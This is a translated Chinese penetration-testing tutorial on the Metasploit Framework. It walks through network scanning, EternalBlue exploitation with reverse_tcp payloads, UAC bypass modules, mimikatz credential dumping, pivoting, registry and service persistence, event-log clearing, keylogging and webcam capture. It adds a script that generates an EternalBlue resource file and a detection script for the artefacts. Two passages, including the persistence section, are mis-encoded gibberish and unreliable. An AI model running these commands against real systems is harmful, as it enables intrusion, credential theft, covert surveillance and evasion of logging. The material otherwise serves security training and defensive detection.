A Brief Look at Penetration Testing with MSF
 
 2019-9-6
 

 

Editor's note:
This article comes from FreeBuf. It walks through the MSF commands used most often in a penetration test and shows how MSF's exploit modules are used to attack a vulnerability; we hope it helps your study.

During a penetration test, MSF (the Metasploit Framework) is an indispensable exploitation tool. It is a free, downloadable framework through which you can easily obtain, develop and run exploits against vulnerabilities in computer software, and it ships with hundreds of professional-grade exploits for known vulnerabilities. It integrates information gathering, vulnerability scanning, privilege escalation, internal-network penetration and more in one tool.

Not long ago MSF moved from 4.17 to 5.0. That release reworked the database handling and the msfconsole experience, and lets the PostgreSQL-backed data service run separately as a RESTful service. It also added a web service framework, new evasion modules, and improvements to the command-and-control functions.

Below, Xiaobai (the author) summarises the MSF commands used most often in penetration testing, split into the following sections.

Information Gathering

Finding live hosts on the target network segment:

We can use the auxiliary modules to collect information about the target segment, including which ports are open and which hosts are alive:

auxiliary/scanner/discovery/arp_sweep        ARP sweep for live hosts
auxiliary/scanner/smb/smb_version            live hosts with 445 open, with their SMB/OS version
auxiliary/scanner/portscan/syn               SYN port scan
auxiliary/scanner/telnet/telnet_version      telnet service scan
auxiliary/scanner/rdp/rdp_scanner            Remote Desktop service scan
auxiliary/scanner/ssh/ssh_version            SSH host scan

......

[Figure 1: scanner module information]

In general, when we do not know the assets in scope, we first scan the whole segment for live hosts and then gather information only about the hosts that are up. This shortens the test and avoids testing blindly; blind information gathering sometimes sends the later phases down the wrong path and the expected result is never reached.

Whether you are port-scanning or probing for live hosts, you always set the target with set rhosts <ip or CIDR>, and when scanning a whole segment you also set the thread count: set threads <n> (choose according to the situation; the option is spelled threads, not thread).

Running run starts the live-host scan of the segment; here it found 7 live servers, so the next step is to gather more information about those hosts, such as whether sensitive ports like 22, 445 and 3389 are open. One note from Xiaobai's own testing experience: I usually do not scan the entire segment first, because that puts load on the target hosts; instead I scan directly for the high-risk ports behind known overflow vulnerabilities, and if one is present, escalating through that overflow is a shortcut. Conversely, if you need a full-port scan, I personally recommend nmap rather than MSF.

Next we probe the segment for hosts with port 445 open. The scan found 3 hosts with 445 open, which we can later test for the EternalBlue (MS17-010) vulnerability:

use auxiliary/scanner/smb/smb_version
set rhosts 192.168.201.1/24 //set the target hosts (a single address or a CIDR range)
set threads 30 //set the number of scanning threads
run //run the scan

(msfconsole commands are case-sensitive: it is use, set and run, not Use, Set and Run.)

The other port-scanning commands from this phase are all much the same. Next, the brute-force (login) modules. Kali ships its own wordlists, and of course you can use your own dictionary instead; use them if they are convenient, skip them if not.

Location of the built-in wordlists:

/usr/share/wordlists/metasploit/

Typical brute-force targets are the common services: ssh, mysql, mssql, Oracle, vnc, telnet and so on:

auxiliary/scanner/mysql/mysql_login
auxiliary/scanner/mssql/mssql_login
auxiliary/scanner/ssh/ssh_login

......

These login modules take USERNAME/PASSWORD for a single pair, or USER_FILE/PASS_FILE (or a combined USERPASS_FILE) for wordlists; STOP_ON_SUCCESS true stops guessing against a host once a valid login is found. Check the account-lockout policy before spraying passwords at domain accounts, or the scan will lock users out instead of logging in.

Vulnerability Detection

From the information gathered so far we know that three of the target hosts have port 445 open, so we can go one step further and probe whether they are vulnerable to EternalBlue. The following commands do the probe.

A caution first: when preparing a training session earlier, a Windows Server 2008 R2 machine in my local lab blue-screened outright during vulnerability verification, for reasons I never pinned down. So always weigh the usability of a vulnerability carefully during a penetration test. The scan found one target host with the EternalBlue vulnerability. Besides EternalBlue there are many other overflow vulnerabilities; they are not covered one by one here, because the principle is the same.

use auxiliary/scanner/smb/smb_ms17_010 //the EternalBlue (MS17-010) check module; it only probes, it does not exploit
show options //list the options that need to be set
set rhosts 192.168.205.1/24 //set the target hosts to scan
set threads 30 //set the number of scanning threads
run //start the scan
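The two scans above (smb_version over the /24, then smb_ms17_010 against the same range) produce console output that has to be turned into a target list by hand. The script below is an added example, not code from the original article or from Metasploit: it parses msfconsole scanner output into per-host records, separates hosts that are "likely VULNERABLE" from those flagged as Server 2008 R2 (which the author saw blue-screen during verification, so they get a manual risk decision first), and writes an msfconsole resource script for the exploitation step. The sample output lines are constructed to match the format of these modules and are not a capture from a real run.

```python
import re
from dataclasses import dataclass

# Constructed sample of msfconsole output from smb_version followed by
# smb_ms17_010 against the same /24 (approximation of the real format, not a capture).
SAMPLE_OUTPUT = """
[*] 192.168.205.1/24:445  - Scanned  26 of 256 hosts (10% complete)
[+] 192.168.205.150:445   - Host is running Windows 7 Ultimate SP1 (build:7601) (name:WIN7-PC) (workgroup:WORKGROUP )
[+] 192.168.205.151:445   - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:SRV01) (domain:CORP )
[+] 192.168.205.152:445   - Host is running Windows 2012 R2 Standard (build:9600) (name:SRV02) (domain:CORP )
[*] 192.168.205.1/24:445  - Scanned 256 of 256 hosts (100% complete)
[+] 192.168.205.150:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[+] 192.168.205.151:445   - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
[-] 192.168.205.152:445   - Host does NOT appear vulnerable.
"""

# "[+] ip:port   - message"; progress lines carry a CIDR (ip/24:port) and do not match.
LINE_RE = re.compile(r"^\[([+\-*!])\]\s+(\d{1,3}(?:\.\d{1,3}){3}):(\d+)\s+-\s+(.*)$")


@dataclass
class Host:
    ip: str
    banner: str = ""           # OS banner from smb_version
    ms17_010: str = "unknown"  # vulnerable | not_vulnerable | unknown
    arch: str = ""             # from the smb_ms17_010 line, e.g. "x64"


def parse_msf_output(text: str) -> dict:
    """Fold scanner output lines into one Host record per target address."""
    hosts = {}
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        _, ip, port, msg = m.groups()
        if port != "445":
            continue
        h = hosts.setdefault(ip, Host(ip))
        if msg.startswith("Host is running "):
            h.banner = msg[len("Host is running "):].strip()
        elif "likely VULNERABLE to MS17-010" in msg:
            h.ms17_010 = "vulnerable"
            h.arch = "x64" if "x64" in msg else "x86"
        elif "does NOT appear vulnerable" in msg:
            h.ms17_010 = "not_vulnerable"
    return hosts


def needs_review(h: Host) -> bool:
    """Hosts the article warns about: Server 2008 R2 crashed during verification,
    so it is exploited only after an explicit risk decision."""
    return "2008 R2" in h.banner


def split_targets(hosts: dict):
    """Return (exploit now, review first) lists of vulnerable addresses."""
    go, review = [], []
    for h in sorted(hosts.values(), key=lambda x: x.ip):
        if h.ms17_010 != "vulnerable":
            continue
        (review if needs_review(h) else go).append(h.ip)
    return go, review


def resource_script(targets, lhost: str, lport: int) -> str:
    """Build an msfconsole resource file (.rc) running the article's exploit
    sequence once per confirmed target. `exploit -z` keeps the console from
    dropping into the new session so the next line of the script still runs."""
    lines = [
        "use exploit/windows/smb/ms17_010_eternalblue",
        "set payload windows/x64/meterpreter/reverse_tcp",
        f"set lhost {lhost}",
        f"set lport {lport}",
    ]
    for ip in targets:
        lines += [f"set rhosts {ip}", "exploit -z"]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    found = parse_msf_output(SAMPLE_OUTPUT)
    go, review = split_targets(found)
    print("exploit now:", go, "| review first:", review)
    print(resource_script(go, "192.168.205.148", 5555))
```

Save the generated text as eternalblue.rc and start it with msfconsole -r eternalblue.rc; the 2008 R2 host stays out of the script until someone decides the crash risk is acceptable.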

Exploitation

The detection phase showed that 192.168.205.150 is vulnerable to EternalBlue, so we can run the matching MSF exploit module against it and see whether we get a shell (a Meterpreter session) on the target. With that foothold we can then use the overflow to move on to lateral scanning of the internal network. Run the following commands:

use exploit/windows/smb/ms17_010_eternalblue //the EternalBlue exploit module
set payload windows/x64/meterpreter/reverse_tcp //the payload; a reverse_tcp payload makes the target connect back to the attacking machine. The module's Windows 7 / Server 2008 R2 target is 64-bit, so the payload must be an x64 one
set rhosts 192.168.205.150 //the target host
set lhost 192.168.205.148 //the address that receives the callback, i.e. the MSF machine
set lport 5555 //the callback port; anything that does not clash with another listener
exploit //launch the attack

Privilege Escalation

Once a target host has returned a shell, the first thing to check is whether the current user has administrator privileges; if not, we need to escalate. Below is the local escalation approach available in Kali's MSF, bypassing UAC to raise the current user's privileges, with the detailed commands and steps.

First, what exactly is UAC and how does it work?

1. What is UAC?

Windows Vista and Windows Server 2008 introduced User Account Control, an architecture meant to prevent unintended system-wide changes in a way that is predictable and requires little user effort. It is a Windows security feature that helps prevent unauthorised modification of the operating system: UAC ensures certain changes are made only with an administrator's authorisation. If the administrator does not approve a change, it is not performed and the system stays as it was.

2. How does UAC work?

UAC works by stopping programs from performing any task that involves system changes or other privileged operations. Unless the process attempting the operation is running elevated, the operation is refused. A program started with "Run as administrator" receives more rights because it runs in an elevated (high-integrity) context, whereas a program an administrator starts normally runs with the filtered, medium-integrity token.

Users without administrator rights cannot run commands that require them, for example editing the machine-wide registry hives, creating users, reading the administrator accounts' password hashes, or creating scheduled tasks and startup items.

The most direct escalation command: getsystem

The precondition for a UAC bypass is that we have already obtained a Meterpreter session on the target through an exploit. After getting Meterpreter session 1, run getuid to check whether we are already SYSTEM (getuid shows the current user; getsystem tries to escalate to SYSTEM, and when it fails because the administrator token is UAC-filtered, a UAC bypass is the usual next step). The steps are not demonstrated live here; the commands follow, and practice makes perfect. We first need to send the session to the background with background.

Method one:

use exploit/windows/local/bypassuac //bypasses Windows UAC by process injection using a trusted publisher certificate; it spawns a second shell with the UAC flag turned off
set session 1 //use session 1
exploit //run the escalation

Once it completes successfully, querying the current user's privileges again (getuid, getprivs) shows administrator-level rights. In my case the session was already an administrator, so the module printed a notice to that effect.

Method two: Windows privilege escalation bypassing UAC (in-memory injection)

This module bypasses Windows UAC by process injection using a trusted publisher certificate and spawns a second shell with the UAC flag turned off. Compared with the ordinary technique, it uses reflective DLL injection and drops only the DLL payload binary rather than three separate binaries. It does, however, require choosing the correct architecture (use x64 for SYSWOW64 systems too). After the following commands the current user's privileges become administrator-level:

use exploit/windows/local/bypassuac_injection
set session 1
exploit

Do not confuse this with exploit/windows/local/bypassuac_fodhelper, a different, registry-based bypass: it plants a command under HKCU\Software\Classes\ms-settings\shell\open\command with an empty DelegateExecute value, so that fodhelper.exe, an auto-elevating Windows binary, runs the payload. Either module works against a UAC-limited administrator; neither helps a plain standard user, whose token has no Administrators membership to unlock.

Method three: via COM handler hijacking

First, what COM handler hijacking is. This module bypasses Windows UAC by creating COM handler registry entries in the HKCU hive. When certain higher-integrity processes load, they consult those entries and so load a user-controlled DLL; that DLL carries the payload that elevates the session. The module modifies the registry but cleans the entries up after the payload has been invoked. It requires the payload architecture to match the operating system, which may differ from the architecture of the current low-privilege Meterpreter session. If EXE::Custom is specified, the payload should call ExitProcess() after starting itself in a separate process. The module invokes the target binary through cmd.exe on the target, so if access to cmd.exe is restricted it will not work.

Commands:

use exploit/windows/local/bypassuac_comhijack
set session 1
exploit

Method four: via the Eventvwr registry key

This module bypasses Windows UAC by hijacking a special key in the registry under the current user's hive and inserting a custom command that is invoked when the Windows Event Viewer (eventvwr.exe, an auto-elevating binary) is started. It spawns a second shell with the UAC flag turned off. The module modifies the registry but cleans the key up after the payload has been invoked, and it does not require the payload architecture to match the operating system. If EXE::Custom is specified, the payload should call ExitProcess() after starting itself in a separate process.

use exploit/windows/local/bypassuac_eventvwr
set session 1
exploit

ÒÔÉϵı¾µØÌáȨµÄÄ£¿é´ó¼Ò¿ÉÒÔ±¾µØÈ¥²âÊÔһϣ¬³ýÁËÕâЩij¿é»¹ÓÐÆäËüµÄͨ¹ýÖ±½Óͨ¹ýincognitoÖеÄaddlocalgroupuserÌáÉý¡¢ms13-081¡¢ms15-051¡¢ms16-032¡¢MS16-016¡¢MS14-068¡¢ms188120win32k_privescÓòȨÏÞÌáÉýµÈÆäËüµÄȨÏÞÌáÉý·½·¨¡£Ð¡°×ÔÚÄÚÍøÉøÍ¸²âÊԵĹý³ÌÖз¢ÏÖһЩ¿Í»§µÄ·þÎñÆ÷´ó¶àÊýΪ2003¡¢2008·þÎñÆ÷£¬ºÜÉÙ2012¡¢2016·þÎñÆ÷¡£

Internal Network Penetration

Now that the target has called back with a shell and the user has been escalated from low privileges to administrator, it is time to move on to internal-network penetration. That area is broad, so this section goes through the commonly used commands in some detail.

cat //show a file's contents
getwd //show the current working directory on the target
download //download a file to the local machine

Create a 1.txt locally and upload it to the desktop of the target server:

upload /opt/1.txt <remote directory> //upload <local file> <remote path>; backslashes in Meterpreter paths are doubled (C:\\Users\\...) or written as forward slashes

Create a pass.txt on the target with the content hello hack!!!! and then run the download command in MSF to pull pass.txt back to the attacking machine.

Command format: download <remote file> <local path>

ipconfig / ifconfig //show the target's IP addresses
arp -a //show every entry in the ARP cache
route //print the routing table
netstat -na //show all connections and listening ports

rdesktop //connect over RDP from Kali with rdesktop -u <username> -p <password> <target>; the tool has to be installed on Kali first. Once we hold an administrator's username and password we can log in to the target directly over Remote Desktop.

...

Routing information is especially useful to the tester. The attacking machine sits outside and the target sits on the internal network, so they cannot talk to each other directly; we therefore add a route through the session so that the attacking machine's traffic for the internal range is carried into it, which lets us sweep the internal network. This is what people call an internal proxy, or pivot.

First we get the target's subnets, then add the route; once added we can scan the internal hosts laterally.

run get_local_subnets //list the subnets the target is attached to
run autoroute -s 192.168.205.1/24 //add a route for that subnet through the current session
run autoroute -p //print the routing table
run autoroute -d -s 172.2.175.0 //delete the route for that subnet
run post/windows/gather/arp_scanner RHOSTS=7.7.7.0/24 //probe for live hosts on that subnet from the target
meterpreter > background //send the session to the background

(In Metasploit 5 the autoroute Meterpreter script prints a deprecation notice; the equivalent is run post/multi/manage/autoroute with SUBNET and NETMASK, and the routes are also shown by the route command in msfconsole. A route only exists while the session that carries it is alive.)
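What autoroute actually maintains is a small routing table inside the framework, keyed by session. The class below is an added example, not code from the original article or from Metasploit: it models that table so the behaviour the commands above rely on can be seen without a live session, including what happens when two routes overlap (the most specific subnet wins, as in Metasploit's switchboard), when a route is deleted with -d, and when the session carrying a route dies. The default netmask of 255.255.255.0 mirrors autoroute's default when -n is omitted; the session numbers are made up.

```python
import ipaddress


class SessionRouteTable:
    """Models the per-session routing table that `run autoroute` manages.
    Every outgoing connection the framework makes is checked against it: the
    most specific (longest prefix) matching subnet wins, and an address that
    matches nothing is contacted directly from the attacking host."""

    DEFAULT_MASK = "255.255.255.0"   # autoroute's default when -n is not given

    def __init__(self):
        self.routes = []  # list of (ipaddress.IPv4Network, session_id)

    @staticmethod
    def _net(subnet, netmask=None):
        """Accept '10.0.0.0/8', '10.0.0.0' (+ default mask) or an explicit mask."""
        if "/" in subnet:
            return ipaddress.ip_network(subnet, strict=False)
        mask = netmask or SessionRouteTable.DEFAULT_MASK
        return ipaddress.ip_network(f"{subnet}/{mask}", strict=False)

    def add(self, subnet, session_id, netmask=None):
        """run autoroute -s SUBNET [-n NETMASK] from inside session_id."""
        net = self._net(subnet, netmask)
        self.routes = [(n, s) for n, s in self.routes if n != net]  # re-adding replaces
        self.routes.append((net, session_id))

    def delete(self, subnet, netmask=None):
        """run autoroute -d -s SUBNET; returns True if a route was removed."""
        net = self._net(subnet, netmask)
        before = len(self.routes)
        self.routes = [(n, s) for n, s in self.routes if n != net]
        return len(self.routes) != before

    def drop_session(self, session_id):
        """When a session dies its routes die with it; traffic for those subnets
        falls back to direct connectivity, which from outside usually means
        'unreachable'."""
        self.routes = [(n, s) for n, s in self.routes if s != session_id]

    def lookup(self, ip):
        """Which session carries traffic to ip? None means 'send it directly'."""
        addr = ipaddress.ip_address(ip)
        best = None
        for net, sid in self.routes:
            if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
                best = (net, sid)
        return best[1] if best else None

    def print_routes(self):
        """run autoroute -p, one line per route."""
        return [f"{n.network_address} {n.netmask} Session {s}" for n, s in self.routes]


if __name__ == "__main__":
    table = SessionRouteTable()
    table.add("192.168.205.1/24", 1)          # the article's pivot
    table.add("172.16.0.0", 2, "255.255.0.0") # a wider range through a second session
    table.add("172.16.10.0", 3)               # a more specific route through a third
    for line in table.print_routes():
        print(line)
    for target in ("192.168.205.150", "172.16.10.5", "172.16.20.5", "8.8.8.8"):
        print(target, "->", table.lookup(target))
```

The practical consequence for the commands above: a scan aimed at a subnet with no route, or whose session has gone away, silently runs from the attacking machine, which is why autoroute -p is worth a glance before each pivoted scan.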

System information:

ps //list the target's processes
kill //kill a process by PID
getuid //show the user the session runs as
pwd //show the current directory on the target
sysinfo //show target host information, such as the OS version
shutdown //shut the machine down (use with care)

Post modules are used a lot, for example to check whether the target is a virtual machine, which software is installed, which patches are applied, and so on. There are far more than the ones listed here; anyone interested should explore further.

run post/windows/gather/checkvm //check whether the target is a virtual machine
run post/windows/gather/enum_applications //list the software installed on the target
run post/windows/gather/enum_patches //list the patches installed on the target
run post/windows/gather/enum_domain //find the target's domain controller (my lab has no DC)
run post/windows/manage/killav //kill anti-virus processes
run post/windows/manage/enable_rdp //enable Remote Desktop (port 3389)
run post/windows/gather/enum_logged_on_users //list users currently and recently logged on
run post/windows/gather/credentials/windows_autologin //grab the auto-logon username and password from the registry
run post/windows/manage/enable_rdp username=xxx password=xxx //additionally create a Remote Desktop user (the user is also added to the Administrators group)

The load command loads a Meterpreter extension; the one used most during testing is the credential-dumping extension.

load mimikatz //load mimikatz for dumping credentials, plaintext passwords as well as hashes
run hashdump //dump the users' password hashes from the SAM
msv //retrieves hashes (from the MSV authentication package)
ssp //retrieves plaintext credentials (from the SSP package)
wdigest //reads the plaintext credentials that WDigest keeps in memory
mimikatz_command -f samdump::hashes //dump user hashes
mimikatz_command -f handle::list //list handles and their owning processes
mimikatz_command -f service::list //list services

(In Metasploit 5 the old mimikatz extension is superseded by kiwi: load kiwi, then creds_all, creds_msv, creds_wdigest, lsa_dump_sam, or kiwi_cmd "<mimikatz command>" for anything else. The session needs SYSTEM, or at least a high-integrity administrator token; otherwise the LSASS reads fail.)

ºóÃų־û¯

ȨÏÞά³Ö

PersistenceÄ£¿é

ÎÒÃÇÏÈ¿´Ò»ÏÂPersistenceÄ£¿éÐÅÏ¢£º

Run persistence -h //²é¿´°ïÖúÐÅÏ¢£»
run persistence -U -i 5 -p 5555 -r 192.168.205.148

-U£ºÉèÖúóÃÅÔÚÓû§µÇ¼ºó×ÔÆô¶¯¡£¸Ã·½Ê½»áÔÚHKCU\Software\Microsoft\Windows\CurrentVersion\RunÏÂÌí¼Ó×¢²á±íÐÅÏ¢¡£ÍƼöʹÓøòÎÊý£»

-i£ºÉèÖ÷´ÏòÁ¬½Ó¼ä¸ôʱ¼ä£¬µ¥Î»ÎªÃ룻

-p£ºÉèÖ÷´ÏòÁ¬½ÓµÄ¶Ë¿ÚºÅ£»

-r£ºÉèÖ÷´ÏòÁ¬½ÓµÄipµØÖ·¡£

The metsvc module:

This one is very simple to use. Run run metsvc from the Meterpreter session; when it finishes, a Meterpreter service set to start automatically is installed on the target, listening on port 31337.

Open another msfconsole and connect to it with the handler to get the shell back: use exploit/multi/handler, set payload windows/metsvc_bind_tcp, set lport 31337, set rhost <target>, exploit. Note that this service accepts connections from anyone who can reach the port, with no authentication, so whoever else finds it also gets SYSTEM on the target.

Covering Tracks

A penetration inevitably leaves log entries behind; the following command wipes them:

clearev is the most direct log-deleting command: it clears the Application, System and Security event logs on the target.

Once it runs, the logs on the target are gone. Be aware that the clearing is itself logged: the Security log records event 1102 ("the audit log was cleared") and the System log event 104, both naming the account that did it, and if logs are forwarded to a central collector the earlier entries have already left the host. On a monitored network this is more of a signal than a cover.
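Every command in the persistence and track-clearing sections above writes something a defender can see: persistence -U creates a Run value pointing into %TEMP%, metsvc installs a service whose binary sits in a temp directory, getgui -u and enable_rdp with USERNAME= create an account and put it into Administrators, and clearev produces the 1102/104 "log cleared" events. The script below is an added example, not code from the original article or from Metasploit: it runs four rules over constructed Windows event records (flattened the way a SIEM presents them after parsing; no real host was involved) and correlates the account-creation pair, so the operator can see what those commands look like from the other side. Field names follow the Windows Security, System and Sysmon event schemas; SIDs, paths and service names are made up.

```python
# Constructed Windows event records (not captured from a real host), flattened
# the way a SIEM presents them after parsing the event XML.
SAMPLE_EVENTS = [
    # run persistence -U: a VBS dropped in %TEMP% and registered under HKCU ...\Run
    {"channel": "Microsoft-Windows-Sysmon/Operational", "event_id": 13,
     "Image": r"C:\Windows\System32\notepad.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\kXqPzLmW",
     "Details": r"C:\Users\bob\AppData\Local\Temp\HsDjQwLf.vbs"},
    # run metsvc: a new service whose binary lives in a temp directory
    {"channel": "System", "event_id": 7045, "ServiceName": "metsvc",
     "ImagePath": r"C:\Users\bob\AppData\Local\Temp\sNdkEtaA\metsvc.exe"},
    # run getgui -u cmdback -p 123123: account created, then added to Administrators
    {"channel": "Security", "event_id": 4720, "SubjectUserName": "bob", "TargetUserName": "cmdback"},
    {"channel": "Security", "event_id": 4732, "SubjectUserName": "bob", "TargetUserName": "Administrators",
     "MemberSid": "S-1-5-21-1111-2222-3333-1005"},
    # clearev: each log is wiped, and the wipe itself is the last entry written
    {"channel": "Security", "event_id": 1102, "SubjectUserName": "bob"},
    {"channel": "System", "event_id": 104, "SubjectUserName": "bob"},
    # benign noise that must not fire
    {"channel": "System", "event_id": 7045, "ServiceName": "WdNisSvc",
     "ImagePath": r"C:\Program Files\Windows Defender\NisSrv.exe"},
    {"channel": "Microsoft-Windows-Sysmon/Operational", "event_id": 13,
     "Image": r"C:\Users\bob\AppData\Local\Microsoft\OneDrive\OneDrive.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r"C:\Users\bob\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
]

# Directories that persistence.rb and metsvc.rb write their artefacts into.
TEMP_MARKERS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")


def in_temp_dir(path: str) -> bool:
    p = path.lower()
    return any(m in p for m in TEMP_MARKERS)


def run_key_points_to_temp(e) -> bool:
    """Sysmon 13: a Run value whose data lives in a temp directory (persistence -U)."""
    return (e["event_id"] == 13
            and "\\currentversion\\run\\" in e.get("TargetObject", "").lower()
            and in_temp_dir(e.get("Details", "")))


def service_from_temp(e) -> bool:
    """System 7045: a new service installed from a temp directory (run metsvc)."""
    return e["event_id"] == 7045 and in_temp_dir(e.get("ImagePath", ""))


def log_cleared(e) -> bool:
    """Security 1102 / System 104: the event log itself was cleared (clearev)."""
    return e["event_id"] == 1102 or (e["event_id"] == 104 and e["channel"] == "System")


def local_admin_added(e) -> bool:
    """Security 4732: a member added to the local Administrators group."""
    return e["event_id"] == 4732 and e.get("TargetUserName", "").lower() == "administrators"


RULES = {
    "run_key_points_to_temp": run_key_points_to_temp,
    "service_from_temp": service_from_temp,
    "log_cleared": log_cleared,
    "local_admin_added": local_admin_added,
}


def detect(events):
    """Return (rule name, event index) for every rule that matches an event."""
    return [(name, i) for i, e in enumerate(events) for name, rule in RULES.items() if rule(e)]


def new_local_admins(events):
    """Correlate 4720 (account created) with a later 4732 into Administrators
    by the same subject: the getgui -u / enable_rdp USERNAME= pattern."""
    created_by = {}
    hits = []
    for e in events:
        if e["event_id"] == 4720:
            created_by[e["SubjectUserName"]] = e["TargetUserName"]
        elif local_admin_added(e) and e.get("SubjectUserName") in created_by:
            hits.append(created_by.pop(e["SubjectUserName"]))
    return hits


if __name__ == "__main__":
    for name, idx in detect(SAMPLE_EVENTS):
        print(f"{name:24s} event #{idx} ({SAMPLE_EVENTS[idx]['channel']} {SAMPLE_EVENTS[idx]['event_id']})")
    print("new local admins:", new_local_admins(SAMPLE_EVENTS))
```

The point for the tester is the ordering: the 1102 and 104 events are written after the clear, so clearev never removes the evidence of its own use, and anything already forwarded off the host is untouched.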

Other Commands

Beyond the above, a few more useful commands:

run getgui -e //enable Remote Desktop
run getgui -u cmdback -p 123123 //add a user (it is also placed in the Administrators and Remote Desktop Users groups)
run getgui -f 4446 -e //forward the target's port 3389 to local port 4446
netsh advfirewall set allprofiles state off //disable the Windows firewall (run from a shell on the target)
webcam_list //list webcams
webcam_stream //stream video from the webcam
webcam_chat //start a video chat session
steal_token <pid> //try to steal the token of the process with the given PID
use incognito //load the incognito extension (steal tokens or impersonate users on the target)
list_tokens -u //list the user tokens available on the target
list_tokens -g //list the group tokens available on the target
keyscan_start //start keystroke capture
keyscan_dump //show the captured keystrokes
keyscan_stop //stop keystroke capture
run post/windows/gather/enum_chrome //collect Chrome data (history, cookies, saved logins)
run post/windows/gather/enum_firefox //collect Firefox data
run post/windows/gather/enum_ie //collect Internet Explorer data
screenshot //take a screenshot of the target's desktop
   